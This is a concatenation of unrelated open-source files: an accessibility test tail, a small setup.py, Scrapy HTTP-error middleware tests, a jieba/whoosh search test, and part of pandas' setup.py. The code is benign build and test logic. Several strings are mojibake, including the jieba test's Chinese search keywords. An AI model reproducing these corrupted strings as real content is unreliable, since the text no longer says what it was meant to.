"SPEECH OUTPUT: 'scrollable notebooks and hidden tabs.'",
"SPEECH OUTPUT: 'image.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
"8. 60482 cell",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Bug number column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: '60482 Normal scrollable notebook', cursor=1",
"SPEECH OUTPUT: 'Bug number column header 60482.'"]))
sequence.append(KeyComboAction("<Alt>F4"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
lgpl-2.1
|
KenjiTakahashi/td
|
setup.py
|
1
|
1625
|
# -*- coding: utf-8 -*-
# This is a part of td @ http://github.com/KenjiTakahashi/td
# Karol "Kenji Takahashi" Woลบniak ยฉ 2012 - 2013
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from setuptools import setup
from td.main import __version__
setup(
name='td',
version=__version__,
description='A non-offensive, per project ToDo manager.',
long_description=open('README.md').read(),
author='Karol "Kenji Takahashi" Woźniak',
author_email='wozniakk@gmail.com',
license='GPL3',
url='http://github.com/KenjiTakahashi/td',
packages=['td'],
scripts=['scripts/td'],
classifiers=[f.strip() for f in """
Development Status :: 4 - Beta
Environment :: Console
Intended Audience :: Developers
Intended Audience :: End Users/Desktop
License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)
Natural Language :: English
Operating System :: OS Independent
Programming Language :: Python :: 3
Topic :: Utilities
""".splitlines() if f.strip()]
)
|
gpl-3.0
|
agreen/scrapy
|
tests/test_spidermiddleware_httperror.py
|
125
|
6935
|
from unittest import TestCase
from testfixtures import LogCapture
from twisted.trial.unittest import TestCase as TrialTestCase
from twisted.internet import defer
from scrapy.utils.test import get_crawler
from tests.mockserver import MockServer
from scrapy.http import Response, Request
from scrapy.spiders import Spider
from scrapy.spidermiddlewares.httperror import HttpErrorMiddleware, HttpError
from scrapy.settings import Settings
class _HttpErrorSpider(Spider):
name = 'httperror'
start_urls = [
"http://localhost:8998/status?n=200",
"http://localhost:8998/status?n=404",
"http://localhost:8998/status?n=402",
"http://localhost:8998/status?n=500",
]
bypass_status_codes = set()
def __init__(self, *args, **kwargs):
super(_HttpErrorSpider, self).__init__(*args, **kwargs)
self.failed = set()
self.skipped = set()
self.parsed = set()
def start_requests(self):
for url in self.start_urls:
yield Request(url, self.parse, errback=self.on_error)
def parse(self, response):
self.parsed.add(response.url[-3:])
def on_error(self, failure):
if isinstance(failure.value, HttpError):
response = failure.value.response
if response.status in self.bypass_status_codes:
self.skipped.add(response.url[-3:])
return self.parse(response)
# it assumes there is a response attached to failure
self.failed.add(failure.value.response.url[-3:])
return failure
def _responses(request, status_codes):
responses = []
for code in status_codes:
response = Response(request.url, status=code)
response.request = request
responses.append(response)
return responses
class TestHttpErrorMiddleware(TestCase):
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404 = _responses(self.req, [200, 404])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res404, self.spider)
def test_process_spider_exception(self):
self.assertEquals([],
self.mw.process_spider_exception(self.res404, \
HttpError(self.res404), self.spider))
self.assertEquals(None,
self.mw.process_spider_exception(self.res404, \
Exception(), self.spider))
def test_handle_httpstatus_list(self):
res = self.res404.copy()
res.request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
self.assertEquals(None,
self.mw.process_spider_input(res, self.spider))
self.spider.handle_httpstatus_list = [404]
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
class TestHttpErrorMiddlewareSettings(TestCase):
"""Similar test, but with settings"""
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({'HTTPERROR_ALLOWED_CODES': (402,)}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404, self.res402 = _responses(self.req, [200, 404, 402])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res404, self.spider)
self.assertEquals(None,
self.mw.process_spider_input(self.res402, self.spider))
def test_meta_overrides_settings(self):
request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
res404 = self.res404.copy()
res404.request = request
res402 = self.res402.copy()
res402.request = request
self.assertEquals(None,
self.mw.process_spider_input(res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, res402, self.spider)
def test_spider_override_settings(self):
self.spider.handle_httpstatus_list = [404]
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res402, self.spider)
class TestHttpErrorMiddlewareHandleAll(TestCase):
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({'HTTPERROR_ALLOW_ALL': True}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404, self.res402 = _responses(self.req, [200, 404, 402])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
def test_meta_overrides_settings(self):
request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
res404 = self.res404.copy()
res404.request = request
res402 = self.res402.copy()
res402.request = request
self.assertEquals(None,
self.mw.process_spider_input(res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, res402, self.spider)
class TestHttpErrorMiddlewareIntegrational(TrialTestCase):
def setUp(self):
self.mockserver = MockServer()
self.mockserver.__enter__()
def tearDown(self):
self.mockserver.__exit__(None, None, None)
@defer.inlineCallbacks
def test_middleware_works(self):
crawler = get_crawler(_HttpErrorSpider)
yield crawler.crawl()
assert not crawler.spider.skipped, crawler.spider.skipped
self.assertEqual(crawler.spider.parsed, {'200'})
self.assertEqual(crawler.spider.failed, {'404', '402', '500'})
@defer.inlineCallbacks
def test_logging(self):
crawler = get_crawler(_HttpErrorSpider)
with LogCapture() as log:
yield crawler.crawl(bypass_status_codes={402})
self.assertEqual(crawler.spider.parsed, {'200', '402'})
self.assertEqual(crawler.spider.skipped, {'402'})
self.assertEqual(crawler.spider.failed, {'404', '500'})
self.assertIn('Ignoring response <404', str(log))
self.assertIn('Ignoring response <500', str(log))
self.assertNotIn('Ignoring response <200', str(log))
self.assertNotIn('Ignoring response <402', str(log))
|
bsd-3-clause
|
PoisonBOx/jieba
|
test/test_whoosh_file.py
|
65
|
1089
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals
import sys
import os
sys.path.append("../")
from whoosh.index import create_in
from whoosh.fields import *
from whoosh.qparser import QueryParser
from jieba.analyse import ChineseAnalyzer
analyzer = ChineseAnalyzer()
schema = Schema(title=TEXT(stored=True), path=ID(stored=True), content=TEXT(stored=True, analyzer=analyzer))
if not os.path.exists("tmp"):
os.mkdir("tmp")
ix = create_in("tmp", schema)
writer = ix.writer()
file_name = sys.argv[1]
with open(file_name,"rb") as inf:
i=0
for line in inf:
i+=1
writer.add_document(
title="line"+str(i),
path="/a",
content=line.decode('gbk','ignore')
)
writer.commit()
searcher = ix.searcher()
parser = QueryParser("content", schema=ix.schema)
for keyword in ("ๆฐดๆๅฐๅง","ไฝ ","first","ไธญๆ","ไบคๆขๆบ","ไบคๆข"):
print("result of " + keyword)
q = parser.parse(keyword)
results = searcher.search(q)
for hit in results:
print(hit.highlights("content"))
print("="*10)
|
mit
|
winklerand/pandas
|
setup.py
|
1
|
31821
|
#!/usr/bin/env python
"""
Parts of this file were taken from the pyzmq project
(https://github.com/zeromq/pyzmq) which have been permitted for use under the
BSD license. Parts are from lxml (https://github.com/lxml/lxml)
"""
import os
from os.path import join as pjoin
import sys
import shutil
from distutils.version import LooseVersion
# versioning
import versioneer
cmdclass = versioneer.get_cmdclass()
def is_platform_windows():
return sys.platform == 'win32' or sys.platform == 'cygwin'
def is_platform_linux():
return sys.platform == 'linux2'
def is_platform_mac():
return sys.platform == 'darwin'
min_cython_ver = '0.23'
try:
import Cython
ver = Cython.__version__
_CYTHON_INSTALLED = ver >= LooseVersion(min_cython_ver)
except ImportError:
_CYTHON_INSTALLED = False
try:
import pkg_resources
from setuptools import setup, Command
_have_setuptools = True
except ImportError:
# no setuptools installed
from distutils.core import setup, Command
_have_setuptools = False
setuptools_kwargs = {}
min_numpy_ver = '1.9.0'
if sys.version_info[0] >= 3:
setuptools_kwargs = {'zip_safe': False,
'install_requires': ['python-dateutil >= 2',
'pytz >= 2011k',
'numpy >= %s' % min_numpy_ver],
'setup_requires': ['numpy >= %s' % min_numpy_ver]}
if not _have_setuptools:
sys.exit("need setuptools/distribute for Py3k"
"\n$ pip install distribute")
else:
setuptools_kwargs = {
'install_requires': ['python-dateutil',
'pytz >= 2011k',
'numpy >= %s' % min_numpy_ver],
'setup_requires': ['numpy >= %s' % min_numpy_ver],
'zip_safe': False,
}
if not _have_setuptools:
try:
import numpy # noqa:F401
import dateutil # noqa:F401
setuptools_kwargs = {}
except ImportError:
sys.exit("install requires: 'python-dateutil < 2','numpy'."
" use pip or easy_install."
"\n $ pip install 'python-dateutil < 2' 'numpy'")
from distutils.extension import Extension # noqa:E402
from distutils.command.build import build # noqa:E402
from distutils.command.build_ext import build_ext as _build_ext # noqa:E402
try:
if not _CYTHON_INSTALLED:
raise ImportError('No supported version of Cython installed.')
try:
from Cython.Distutils.old_build_ext import old_build_ext as _build_ext # noqa:F811,E501
except ImportError:
# Pre 0.25
from Cython.Distutils import build_ext as _build_ext
cython = True
except ImportError:
cython = False
if cython:
try:
try:
from Cython import Tempita as tempita
except ImportError:
import tempita
except ImportError:
raise ImportError('Building pandas requires Tempita: '
'pip install Tempita')
_pxi_dep_template = {
'algos': ['_libs/algos_common_helper.pxi.in',
'_libs/algos_take_helper.pxi.in',
'_libs/algos_rank_helper.pxi.in'],
'groupby': ['_libs/groupby_helper.pxi.in'],
'join': ['_libs/join_helper.pxi.in', '_libs/join_func_helper.pxi.in'],
'reshape': ['_libs/reshape_helper.pxi.in'],
'hashtable': ['_libs/hashtable_class_helper.pxi.in',
'_libs/hashtable_func_helper.pxi.in'],
'index': ['_libs/index_class_helper.pxi.in'],
'sparse': ['_libs/sparse_op_helper.pxi.in'],
'interval': ['_libs/intervaltree.pxi.in']}
_pxifiles = []
_pxi_dep = {}
for module, files in _pxi_dep_template.items():
pxi_files = [pjoin('pandas', x) for x in files]
_pxifiles.extend(pxi_files)
_pxi_dep[module] = pxi_files
class build_ext(_build_ext):
def build_extensions(self):
# if building from c files, don't need to
# generate template output
if cython:
for pxifile in _pxifiles:
# build pxifiles first, template extension must be .pxi.in
assert pxifile.endswith('.pxi.in')
outfile = pxifile[:-3]
if (os.path.exists(outfile) and
os.stat(pxifile).st_mtime < os.stat(outfile).st_mtime):
# if .pxi.in is not updated, no need to output .pxi
continue
with open(pxifile, "r") as f:
tmpl = f.read()
pyxcontent = tempita.sub(tmpl)
with open(outfile, "w") as f:
f.write(pyxcontent)
numpy_incl = pkg_resources.resource_filename('numpy', 'core/include')
for ext in self.extensions:
if (hasattr(ext, 'include_dirs') and
numpy_incl not in ext.include_dirs):
ext.include_dirs.append(numpy_incl)
_build_ext.build_extensions(self)
DESCRIPTION = ("Powerful data structures for data analysis, time series, "
"and statistics")
LONG_DESCRIPTION = """
**pandas** is a Python package providing fast, flexible, and expressive data
structures designed to make working with structured (tabular, multidimensional,
potentially heterogeneous) and time series data both easy and intuitive. It
aims to be the fundamental high-level building block for doing practical,
**real world** data analysis in Python. Additionally, it has the broader goal
of becoming **the most powerful and flexible open source data analysis /
manipulation tool available in any language**. It is already well on its way
toward this goal.
pandas is well suited for many different kinds of data:
- Tabular data with heterogeneously-typed columns, as in an SQL table or
Excel spreadsheet
- Ordered and unordered (not necessarily fixed-frequency) time series data.
- Arbitrary matrix data (homogeneously typed or heterogeneous) with row and
column labels
- Any other form of observational / statistical data sets. The data actually
need not be labeled at all to be placed into a pandas data structure
The two primary data structures of pandas, Series (1-dimensional) and DataFrame
(2-dimensional), handle the vast majority of typical use cases in finance,
statistics, social science, and many areas of engineering. For R users,
DataFrame provides everything that R's ``data.frame`` provides and much
more. pandas is built on top of `NumPy <http://www.numpy.org>`__ and is
intended to integrate well within a scientific computing environment with many
other 3rd party libraries.
Here are just a few of the things that pandas does well:
- Easy handling of **missing data** (represented as NaN) in floating point as
well as non-floating point data
- Size mutability: columns can be **inserted and deleted** from DataFrame and
higher dimensional objects
- Automatic and explicit **data alignment**: objects can be explicitly
aligned to a set of labels, or the user can simply ignore the labels and
let `Series`, `DataFrame`, etc. automatically align the data for you in
computations
- Powerful, flexible **group by** functionality to perform
split-apply-combine operations on data sets, for both aggregating and
transforming data
- Make it **easy to convert** ragged, differently-indexed data in other
Python and NumPy data structures into DataFrame objects
- Intelligent label-based **slicing**, **fancy indexing**, and **subsetting**
of large data sets
- Intuitive **merging** and **joining** data sets
- Flexible **reshaping** and pivoting of data sets
- **Hierarchical** labeling of axes (possible to have multiple labels per
tick)
- Robust IO tools for loading data from **flat files** (CSV and delimited),
Excel files, databases, and saving / loading data from the ultrafast **HDF5
format**
- **Time series**-specific functionality: date range generation and frequency
conversion, moving window statistics, moving window linear regressions,
date shifting and lagging, etc.
Many of these principles are here to address the shortcomings frequently
experienced using other languages / scientific research environments. For data
scientists, working with data is typically divided into multiple stages:
munging and cleaning data, analyzing / modeling it, then organizing the results
of the analysis into a form suitable for plotting or tabular display. pandas is
the ideal tool for all of these tasks.
Notes
-----
Windows binaries built against NumPy 1.8.1
"""
DISTNAME = 'pandas'
LICENSE = 'BSD'
AUTHOR = "The PyData Development Team"
EMAIL = "pydata@googlegroups.com"
URL = "http://pandas.pydata.org"
DOWNLOAD_URL = ''
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Cython',
'Topic :: Scientific/Engineering']
class CleanCommand(Command):
"""Custom distutils command to clean the .so and .pyc files."""
user_options = [("all", "a", "")]
def initialize_options(self):
self.all = True
self._clean_me = []
self._clean_trees = []
base = pjoin('pandas', '_libs', 'src')
dt = pjoin(base, 'datetime')
src = base
util = pjoin('pandas', 'util')
parser = pjoin(base, 'parser')
ujson_python = pjoin(base, 'ujson', 'python')
ujson_lib = pjoin(base, 'ujson', 'lib')
self._clean_exclude = [pjoin(dt, 'np_datetime.c'),
pjoin(dt, 'np_datetime_strings.c'),
pjoin(src, 'period_helper.c'),
pjoin(parser, 'tokenizer.c'),
pjoin(parser, 'io.c'),
pjoin(ujson_python, 'ujson.c'),
pjoin(ujson_python, 'objToJSON.c'),
pjoin(ujson_python, 'JSONtoObj.c'),
pjoin(ujson_lib, 'ultrajsonenc.c'),
pjoin(ujson_lib, 'ultrajsondec.c'),
pjoin(util, 'move.c'),
]
for root, dirs, files in os.walk('pandas'):
for f in files:
filepath = pjoin(root, f)
if filepath in self._clean_exclude:
continue
if os.path.splitext(f)[-1] in ('.pyc', '.so', '.o',
'.pyo',
'.pyd', '.c', '.orig'):
self._clean_me.append(filepath)
for d in dirs:
if d == '__pycache__':
self._clean_trees.append(pjoin(root, d))
# clean the generated pxi files
for pxifile in _pxifiles:
pxifile = pxifile.replace(".pxi.in", ".pxi")
self._clean_me.append(pxifile)
for d in ('build', 'dist'):
if os.path.exists(d):
self._clean_trees.append(d)
def finalize_options(self):
pass
def run(self):
for clean_me in self._clean_me:
try:
os.unlink(clean_me)
except Exception:
pass
for clean_tree in self._clean_trees:
try:
shutil.rmtree(clean_tree)
except Exception:
pass
# we need to inherit from the versioneer
# class as it encodes the version info
sdist_class = cmdclass['sdist']
class CheckSDist(sdist_class):
"""Custom sdist that ensures Cython has compiled all pyx files to c."""
_pyxfiles = ['pandas/_libs/lib.pyx',
'pandas/_libs/hashtable.pyx',
'pandas/_libs/tslib.pyx',
'pandas/_libs/period.pyx',
'pandas/_libs/index.pyx',
'pandas/_libs/algos.pyx',
'pandas/_libs/join.pyx',
'pandas/_libs/indexing.pyx',
'pandas/_libs/interval.pyx',
'pandas/_libs/hashing.pyx',
'pandas/_libs/missing.pyx',
'pandas/_libs/testing.pyx',
'pandas/_libs/window.pyx',
'pandas/_libs/skiplist.pyx',
'pandas/_libs/sparse.pyx',
'pandas/_libs/parsers.pyx',
'pandas/_libs/tslibs/strptime.pyx',
'pandas/_libs/tslibs/np_datetime.pyx',
'pandas/_libs/tslibs/timedeltas.pyx',
'pandas/_libs/tslibs/timestamps.pyx',
'pandas/_libs/tslibs/timezones.pyx',
'pandas/_libs/tslibs/conversion.pyx',
'pandas/_libs/tslibs/fields.pyx',
'pandas/_libs/tslibs/offsets.pyx',
'pandas/_libs/tslibs/frequencies.pyx',
'pandas/_libs/tslibs/resolution.pyx',
'pandas/_libs/tslibs/parsing.pyx',
'pandas/io/sas/sas.pyx']
def initialize_options(self):
sdist_class.initialize_options(self)
def run(self):
if 'cython' in cmdclass:
self.run_command('cython')
else:
for pyxfile in self._pyxfiles:
cfile = pyxfile[:-3] + 'c'
msg = "C-source file '%s' not found." % (cfile) +\
" Run 'setup.py cython' before sdist."
assert os.path.isfile(cfile), msg
sdist_class.run(self)
class CheckingBuildExt(build_ext):
"""
    Subclass build_ext to get a clearer report if Cython is necessary.
"""
def check_cython_extensions(self, extensions):
for ext in extensions:
for src in ext.sources:
if not os.path.exists(src):
print("{}: -> [{}]".format(ext.name, ext.sources))
raise Exception("""Cython-generated file '%s' not found.
Cython is required to compile pandas from a development branch.
Please install Cython or download a release package of pandas.
""" % src)
def build_extensions(self):
self.check_cython_extensions(self.extensions)
build_ext.build_extensions(self)
class CythonCommand(build_ext):
"""Custom distutils command subclassed from Cython.Distutils.build_ext
to compile pyx->c, and stop there. All this does is override the
C-compile method build_extension() with a no-op."""
def build_extension(self, ext):
pass
class DummyBuildSrc(Command):
""" numpy's build_src command interferes with Cython's build_ext.
"""
user_options = []
def initialize_options(self):
self.py_modules_dict = {}
def finalize_options(self):
pass
def run(self):
pass
cmdclass.update({'clean': CleanCommand,
'build': build})
try:
from wheel.bdist_wheel import bdist_wheel
class BdistWheel(bdist_wheel):
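        # Widen the macOS platform tag so a single binary wheel advertises
        # compatibility with the 10.6/10.9 Intel and x86_64 tags.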
def get_tag(self):
tag = bdist_wheel.get_tag(self)
repl = 'macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64'
if tag[2] == 'macosx_10_6_intel':
tag = (tag[0], tag[1], repl)
return tag
cmdclass['bdist_wheel'] = BdistWheel
except ImportError:
pass
if cython:
suffix = '.pyx'
cmdclass['build_ext'] = CheckingBuildExt
cmdclass['cython'] = CythonCommand
else:
suffix = '.c'
cmdclass['build_src'] = DummyBuildSrc
cmdclass['build_ext'] = CheckingBuildExt
lib_depends = ['reduce', 'inference']
def srcpath(name=None, suffix='.pyx', subdir='src'):
return pjoin('pandas', subdir, name + suffix)
if suffix == '.pyx':
lib_depends = [srcpath(f, suffix='.pyx', subdir='_libs/src')
for f in lib_depends]
lib_depends.append('pandas/_libs/src/util.pxd')
else:
lib_depends = []
plib_depends = []
common_include = ['pandas/_libs/src/klib', 'pandas/_libs/src']
def pxd(name):
return os.path.abspath(pjoin('pandas', name + '.pxd'))
# args to ignore warnings
if is_platform_windows():
extra_compile_args = []
else:
extra_compile_args = ['-Wno-unused-function']
lib_depends = lib_depends + ['pandas/_libs/src/numpy_helper.h',
'pandas/_libs/src/parse_helper.h',
'pandas/_libs/src/compat_helper.h']
np_datetime_headers = ['pandas/_libs/src/datetime/np_datetime.h',
'pandas/_libs/src/datetime/np_datetime_strings.h']
np_datetime_sources = ['pandas/_libs/src/datetime/np_datetime.c',
'pandas/_libs/src/datetime/np_datetime_strings.c']
tseries_depends = np_datetime_headers + ['pandas/_libs/src/datetime.pxd',
'pandas/_libs/tslibs/np_datetime.pxd']
# some Linux distros require linking against libm explicitly
libraries = ['m'] if not is_platform_windows() else []
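# Each ext_data entry describes one Cython extension module: 'pyxfile' is the
# module source (without suffix), 'pxdfiles' lists .pxd dependencies, and the
# optional 'depends' / 'sources' / 'include' keys feed the Extension() objects
# built in the loop further below.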
ext_data = {
'_libs.algos': {
'pyxfile': '_libs/algos',
'pxdfiles': ['_libs/src/util', '_libs/algos', '_libs/hashtable'],
'depends': _pxi_dep['algos']},
'_libs.groupby': {
'pyxfile': '_libs/groupby',
'pxdfiles': ['_libs/src/util', '_libs/algos'],
'depends': _pxi_dep['groupby']},
'_libs.hashing': {
'pyxfile': '_libs/hashing'},
'_libs.hashtable': {
'pyxfile': '_libs/hashtable',
'pxdfiles': ['_libs/hashtable', '_libs/missing', '_libs/khash'],
'depends': (['pandas/_libs/src/klib/khash_python.h'] +
_pxi_dep['hashtable'])},
'_libs.index': {
'pyxfile': '_libs/index',
'pxdfiles': ['_libs/src/util', '_libs/hashtable'],
'depends': _pxi_dep['index'],
'sources': np_datetime_sources},
'_libs.indexing': {
'pyxfile': '_libs/indexing'},
'_libs.interval': {
'pyxfile': '_libs/interval',
'pxdfiles': ['_libs/hashtable'],
'depends': _pxi_dep['interval']},
'_libs.join': {
'pyxfile': '_libs/join',
'pxdfiles': ['_libs/src/util', '_libs/hashtable'],
'depends': _pxi_dep['join']},
'_libs.lib': {
'pyxfile': '_libs/lib',
'pxdfiles': ['_libs/src/util', '_libs/missing'],
'depends': lib_depends + tseries_depends},
'_libs.missing': {
'pyxfile': '_libs/missing',
'pxdfiles': ['_libs/src/util'],
'depends': tseries_depends},
'_libs.parsers': {
'pyxfile': '_libs/parsers',
'depends': ['pandas/_libs/src/parser/tokenizer.h',
'pandas/_libs/src/parser/io.h',
'pandas/_libs/src/numpy_helper.h'],
'sources': ['pandas/_libs/src/parser/tokenizer.c',
'pandas/_libs/src/parser/io.c']},
'_libs.period': {
'pyxfile': '_libs/period',
'pxdfiles': ['_libs/src/util',
'_libs/lib',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timezones',
'_libs/tslibs/nattype'],
'depends': tseries_depends + ['pandas/_libs/src/period_helper.h'],
'sources': np_datetime_sources + ['pandas/_libs/src/period_helper.c']},
'_libs.properties': {
'pyxfile': '_libs/properties',
'include': []},
'_libs.reshape': {
'pyxfile': '_libs/reshape',
'depends': _pxi_dep['reshape']},
'_libs.skiplist': {
'pyxfile': '_libs/skiplist',
'depends': ['pandas/_libs/src/skiplist.h']},
'_libs.sparse': {
'pyxfile': '_libs/sparse',
'depends': _pxi_dep['sparse']},
'_libs.tslib': {
'pyxfile': '_libs/tslib',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timestamps',
'_libs/tslibs/timezones',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.conversion': {
'pyxfile': '_libs/tslibs/conversion',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype',
'_libs/tslibs/timezones',
'_libs/tslibs/timedeltas'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.fields': {
'pyxfile': '_libs/tslibs/fields',
'pxdfiles': ['_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.frequencies': {
'pyxfile': '_libs/tslibs/frequencies',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.nattype': {
'pyxfile': '_libs/tslibs/nattype',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.np_datetime': {
'pyxfile': '_libs/tslibs/np_datetime',
'depends': np_datetime_headers,
'sources': np_datetime_sources},
'_libs.tslibs.offsets': {
'pyxfile': '_libs/tslibs/offsets',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/frequencies',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.parsing': {
'pyxfile': '_libs/tslibs/parsing',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.resolution': {
'pyxfile': '_libs/tslibs/resolution',
'pxdfiles': ['_libs/src/util',
'_libs/khash',
'_libs/tslibs/frequencies',
'_libs/tslibs/timezones'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.strptime': {
'pyxfile': '_libs/tslibs/strptime',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.timedeltas': {
'pyxfile': '_libs/tslibs/timedeltas',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype'],
'depends': np_datetime_headers,
'sources': np_datetime_sources},
'_libs.tslibs.timestamps': {
'pyxfile': '_libs/tslibs/timestamps',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/nattype',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timezones'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.timezones': {
'pyxfile': '_libs/tslibs/timezones',
'pxdfiles': ['_libs/src/util']},
'_libs.testing': {
'pyxfile': '_libs/testing'},
'_libs.window': {
'pyxfile': '_libs/window',
'pxdfiles': ['_libs/skiplist', '_libs/src/util']},
'io.sas._sas': {
'pyxfile': 'io/sas/sas'}}
extensions = []
for name, data in ext_data.items():
sources = [srcpath(data['pyxfile'], suffix=suffix, subdir='')]
pxds = [pxd(x) for x in data.get('pxdfiles', [])]
if suffix == '.pyx' and pxds:
sources.extend(pxds)
sources.extend(data.get('sources', []))
include = data.get('include', common_include)
obj = Extension('pandas.%s' % name,
sources=sources,
depends=data.get('depends', []),
include_dirs=include,
extra_compile_args=extra_compile_args)
extensions.append(obj)
# ----------------------------------------------------------------------
# msgpack
if sys.byteorder == 'big':
macros = [('__BIG_ENDIAN__', '1')]
else:
macros = [('__LITTLE_ENDIAN__', '1')]
msgpack_include = ['pandas/_libs/src/msgpack'] + common_include
msgpack_suffix = suffix if suffix == '.pyx' else '.cpp'
unpacker_depends = ['pandas/_libs/src/msgpack/unpack.h',
'pandas/_libs/src/msgpack/unpack_define.h',
'pandas/_libs/src/msgpack/unpack_template.h']
packer_ext = Extension('pandas.io.msgpack._packer',
depends=['pandas/_libs/src/msgpack/pack.h',
'pandas/_libs/src/msgpack/pack_template.h'],
sources=[srcpath('_packer',
suffix=msgpack_suffix,
subdir='io/msgpack')],
language='c++',
include_dirs=msgpack_include,
define_macros=macros,
extra_compile_args=extra_compile_args)
unpacker_ext = Extension('pandas.io.msgpack._unpacker',
depends=unpacker_depends,
sources=[srcpath('_unpacker',
suffix=msgpack_suffix,
subdir='io/msgpack')],
language='c++',
include_dirs=msgpack_include,
define_macros=macros,
extra_compile_args=extra_compile_args)
extensions.append(packer_ext)
extensions.append(unpacker_ext)
# ----------------------------------------------------------------------
# ujson
if suffix == '.pyx' and 'setuptools' in sys.modules:
# undo dumb setuptools bug clobbering .pyx sources back to .c
for ext in extensions:
if ext.sources[0].endswith(('.c', '.cpp')):
root, _ = os.path.splitext(ext.sources[0])
ext.sources[0] = root + suffix
ujson_ext = Extension('pandas._libs.json',
depends=['pandas/_libs/src/ujson/lib/ultrajson.h',
'pandas/_libs/src/numpy_helper.h'],
sources=(['pandas/_libs/src/ujson/python/ujson.c',
'pandas/_libs/src/ujson/python/objToJSON.c',
'pandas/_libs/src/ujson/python/JSONtoObj.c',
'pandas/_libs/src/ujson/lib/ultrajsonenc.c',
'pandas/_libs/src/ujson/lib/ultrajsondec.c'] +
np_datetime_sources),
include_dirs=(['pandas/_libs/src/ujson/python',
'pandas/_libs/src/ujson/lib',
'pandas/_libs/src/datetime'] +
common_include),
extra_compile_args=(['-D_GNU_SOURCE'] +
extra_compile_args))
extensions.append(ujson_ext)
# ----------------------------------------------------------------------
# util
# extension for pseudo-safely moving bytes into mutable buffers
_move_ext = Extension('pandas.util._move',
depends=[],
sources=['pandas/util/move.c'])
extensions.append(_move_ext)
if _have_setuptools:
setuptools_kwargs["test_suite"] = "nose.collector"
# The build cache system does string matching below this point.
# If you change something, be careful.
setup(name=DISTNAME,
maintainer=AUTHOR,
version=versioneer.get_version(),
packages=['pandas',
'pandas.api',
'pandas.api.types',
'pandas.compat',
'pandas.compat.numpy',
'pandas.core',
'pandas.core.dtypes',
'pandas.core.indexes',
'pandas.core.computation',
'pandas.core.reshape',
'pandas.core.sparse',
'pandas.core.tools',
'pandas.core.util',
'pandas.computation',
'pandas.errors',
'pandas.formats',
'pandas.io',
'pandas.io.json',
'pandas.io.sas',
'pandas.io.msgpack',
'pandas.io.formats',
'pandas.io.clipboard',
'pandas._libs',
'pandas._libs.tslibs',
'pandas.plotting',
'pandas.stats',
'pandas.types',
'pandas.util',
'pandas.tests',
'pandas.tests.api',
'pandas.tests.dtypes',
'pandas.tests.computation',
'pandas.tests.sparse',
'pandas.tests.frame',
'pandas.tests.generic',
'pandas.tests.indexing',
'pandas.tests.indexes',
'pandas.tests.indexes.datetimes',
'pandas.tests.indexes.timedeltas',
'pandas.tests.indexes.period',
'pandas.tests.internals',
'pandas.tests.io',
